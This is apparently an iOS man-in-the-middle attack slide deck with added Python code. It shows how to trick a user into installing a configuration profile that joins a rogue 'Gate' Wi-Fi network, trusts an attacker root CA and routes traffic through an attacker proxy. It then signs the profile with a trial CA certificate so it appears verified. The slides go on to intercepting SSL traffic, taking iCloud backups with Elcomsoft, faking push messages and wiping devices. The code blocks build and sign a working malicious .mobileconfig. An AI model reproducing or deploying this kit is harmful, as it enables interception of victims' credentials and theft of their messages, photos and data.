iOS MITM Attack Technology and effects
sieg.in 1
Boot validation
• CA – Apple Certificate Authority
• SIGN – Signature
Files Protection
Classic provisioning
Actual provisioning
Why can't we create a fake signature?
Because the "Apple Root CA" SHA-1 fingerprint is hardcoded into iOS and must be 61:1E:5B:66:2C:59:3A:08:FF:58:D1:4A:E2:24:52:D1:98:DF:6C:60
SSL
Certificate Authority Storage
A few of the 186 are quite interesting:
– C=US, O=U.S. Government, OU=DoD, OU=PKI, CN=DoD CLASS 3 Root CA
– C=JP, O=Japanese Government, OU=ApplicationCA
– C=CN, O=China Internet Network Information Center, CN=China Internet Network Information Center EV Certificates Root
…
Certificate authentication
I want my CA in your iOS
Ways to install a CA in iOS
o Safari
o Email attachment
o MDM
Each of these delivers a configuration profile (.mobileconfig)
The profile can be installed straight from Safari
Attack
The mobileconfig contains:
WiFi settings (SSID, password) for the attacker's "Gate" network
The attacker's CA
Proxy settings, so we still get the victim's traffic after it has left the attack range (iOS 6 only)
iCloud backup (enable it if it is not already)
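The profile described above, assembled as an added example (this is not the deck author's code or tooling): it builds a .mobileconfig with the Wi-Fi, root CA and global HTTP proxy payloads using only the Python standard library, and parses it back the way a defender would inspect a profile before tapping "Install". Payload type strings and keys follow Apple's Configuration Profile Reference; the SSID, password, proxy host, identifiers and the certificate bytes are constructed placeholders. The iCloud backup item from the slide is not included, since no profile key that turns iCloud backup on is shown on the page.

```python
import plistlib
import uuid

# Constructed stand-in for the attacker's CA certificate in DER form; a real
# profile embeds the actual DER bytes of the root to be trusted.
FAKE_CA_DER = b"\x30\x82\x01\x00" + bytes(252)

# Hypothetical attacker infrastructure, chosen for this example only.
GATE_SSID = "Gate"
GATE_PASSWORD = "gate-wifi-pass"
PROXY_HOST = "proxy.example.net"
PROXY_PORT = 8080


def _payload(payload_type, identifier, display_name, **content):
    """Common keys every payload in a profile must carry, plus its own keys."""
    payload = {
        "PayloadType": payload_type,
        "PayloadIdentifier": identifier,
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadVersion": 1,
        "PayloadDisplayName": display_name,
    }
    payload.update(content)
    return payload


def wifi_payload(ssid, password):
    """WPA network the device joins automatically: the victim never types the key."""
    return _payload(
        "com.apple.wifi.managed", "net.example.attacker.wifi", "Wi-Fi",
        SSID_STR=ssid, Password=password, EncryptionType="WPA",
        AutoJoin=True, HIDDEN_NETWORK=False,
    )


def root_ca_payload(der_bytes):
    """Root certificate payload: iOS adds it to the trust store, so leaf certs
    the attacker issues under this CA pass SSL validation in Safari and apps."""
    return _payload(
        "com.apple.security.root", "net.example.attacker.ca", "Root CA",
        PayloadContent=der_bytes,
    )


def global_proxy_payload(host, port):
    """Global HTTP proxy: keeps routing traffic to the attacker once the victim
    has left the rogue AP's range (the deck notes iOS 6 for this payload)."""
    return _payload(
        "com.apple.proxy.http.global", "net.example.attacker.proxy", "Proxy",
        ProxyType="Manual", ProxyServer=host, ProxyServerPort=port,
    )


def build_profile(ssid=GATE_SSID, password=GATE_PASSWORD,
                  ca_der=FAKE_CA_DER, proxy=(PROXY_HOST, PROXY_PORT)):
    """Top-level profile as XML plist bytes, ready to be saved as .mobileconfig."""
    profile = {
        "PayloadType": "Configuration",
        "PayloadIdentifier": "net.example.attacker",
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadVersion": 1,
        "PayloadDisplayName": "Free Wi-Fi",
        "PayloadDescription": "Connects you to free Wi-Fi",
        "PayloadOrganization": "Gate Wi-Fi",
        "PayloadContent": [
            wifi_payload(ssid, password),
            root_ca_payload(ca_der),
            global_proxy_payload(*proxy),
        ],
    }
    return plistlib.dumps(profile, fmt=plistlib.FMT_XML)


def profile_summary(profile_bytes):
    """Parse a profile back and report what installing it would change:
    the view a defender wants before tapping 'Install'."""
    profile = plistlib.loads(profile_bytes)
    by_type = {p["PayloadType"]: p for p in profile["PayloadContent"]}
    wifi = by_type.get("com.apple.wifi.managed", {})
    proxy = by_type.get("com.apple.proxy.http.global", {})
    ca = by_type.get("com.apple.security.root", {})
    return {
        "root_type": profile["PayloadType"],
        "payload_types": sorted(by_type),
        "ssid": wifi.get("SSID_STR"),
        "proxy": (proxy.get("ProxyServer"), proxy.get("ProxyServerPort")),
        "ca_der": ca.get("PayloadContent"),
    }


if __name__ == "__main__":
    blob = build_profile()
    open("gate.mobileconfig", "wb").write(blob)
    print(profile_summary(blob))
```

Note that a profile built this way is unsigned, which is exactly what produces the warning on the next slides: iOS shows it as "Not Verified" until it carries a signature chaining to a CA already in the device's trust store.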
Mobileconfig installation
Looks bad =(
Let's take a look at the default CA list...
COMODO trial certificate
• You only need a valid [email protected] mailbox for confirmation
• Can be used for signing
How to sign
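The signing step, as an added example rather than the deck's own tooling: iOS treats a profile as signed when the plist is wrapped in a DER-encoded CMS (PKCS#7) SignedData structure with the content embedded, and shows it as "Verified" when the signer chains to a root in its trust store (the COMODO trial certificate from the previous slide, in the deck's case). This block drives the OpenSSL command line for that from Python. The slides do not show which tool the author used, so the `openssl cms` invocation is my assumption of one way to do it; the signer here is a throwaway self-signed certificate (which iOS would still show as unverified) so that the sequence runs offline, and the profile body and file names are constructed.

```python
import plistlib
import shutil
import subprocess
import tempfile
from pathlib import Path

# Path of the OpenSSL CLI, or None when it is not installed.
OPENSSL = shutil.which("openssl")

# Constructed minimal profile body; in practice this is the attack profile
# (Wi-Fi + CA + proxy payloads) built earlier.
MINIMAL_PROFILE = plistlib.dumps({
    "PayloadType": "Configuration",
    "PayloadIdentifier": "net.example.demo",
    "PayloadUUID": "0F0E0D0C-0B0A-0908-0706-050403020100",
    "PayloadVersion": 1,
    "PayloadDisplayName": "Demo profile",
    "PayloadContent": [],
})


def _openssl(*args):
    """Run one OpenSSL command and return its stdout; raise on non-zero exit."""
    if OPENSSL is None:
        raise RuntimeError("openssl binary not found in PATH")
    return subprocess.run([OPENSSL, *args], check=True, capture_output=True).stdout


def make_signer(workdir):
    """Throwaway RSA key and self-signed certificate, a hypothetical stand-in
    for the CA-issued signing certificate. Returns (key_path, cert_path)."""
    key, cert = workdir / "signer.key", workdir / "signer.pem"
    _openssl("req", "-x509", "-newkey", "rsa:2048", "-nodes",
             "-keyout", str(key), "-out", str(cert), "-days", "1",
             "-subj", "/CN=profile signer")
    return key, cert


def sign_profile(profile_bytes, key, cert, out_path, chain=None):
    """Wrap the profile in DER CMS SignedData with the plist embedded
    (-nodetach): the layout iOS expects for a signed .mobileconfig.
    Intermediate certificates go in via -certfile so the device can build a
    chain from the signer up to a root it already trusts."""
    unsigned = out_path.with_suffix(".unsigned")
    unsigned.write_bytes(profile_bytes)
    cmd = ["cms", "-sign", "-binary", "-nodetach", "-outform", "DER",
           "-in", str(unsigned), "-out", str(out_path),
           "-signer", str(cert), "-inkey", str(key)]
    if chain is not None:
        cmd += ["-certfile", str(chain)]
    _openssl(*cmd)
    return out_path


def verify_profile(signed_path, trusted_cert):
    """Verify the signature against a trust anchor and return the embedded
    profile dict, or None when verification fails (iOS shows 'Not Verified'
    in that case and 'Verified' otherwise)."""
    result = subprocess.run(
        [OPENSSL, "cms", "-verify", "-binary", "-inform", "DER",
         "-in", str(signed_path), "-CAfile", str(trusted_cert)],
        capture_output=True)
    if result.returncode != 0:
        return None
    return plistlib.loads(result.stdout)


def demo():
    """Sign, verify, then corrupt the signed blob and confirm it is rejected."""
    with tempfile.TemporaryDirectory() as tmp:
        work = Path(tmp)
        key, cert = make_signer(work)
        signed = sign_profile(MINIMAL_PROFILE, key, cert, work / "demo.mobileconfig")
        profile = verify_profile(signed, cert)
        blob = bytearray(signed.read_bytes())
        blob[-1] ^= 0xFF  # flip the last byte of the signature value
        tampered = work / "tampered.mobileconfig"
        tampered.write_bytes(blob)
        return {
            "verified": profile is not None
                        and profile["PayloadIdentifier"] == "net.example.demo",
            "tampered_rejected": verify_profile(tampered, cert) is None,
        }


if __name__ == "__main__":
    print(demo())
```

To reproduce what the deck did, pass the certificate and key issued by the trusted CA to `sign_profile` and its intermediate chain as `chain`; the device then verifies the profile against its built-in CA list instead of the self-signed stand-in used here.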
Looks much better
SSL defeated. But we want more
How to get files from device
Elcomsoft Phone Password Breaker
Once again
What’s in backup?
• SMS
• Private photos
• Emails
• Application data
• And more …
Files done. But we want more
Apple Push Notification Service
Fake! Fake! Fake!
Wipe Tragedy (act 1/1)
Summary
The user only has to tap 'Install' twice for us to be able to:
– Sniff all of his SSL traffic (cookies, passwords, etc.)
– Steal his backup (call log, SMS log, photos and application data)
– Send him funny push messages or just wipe the device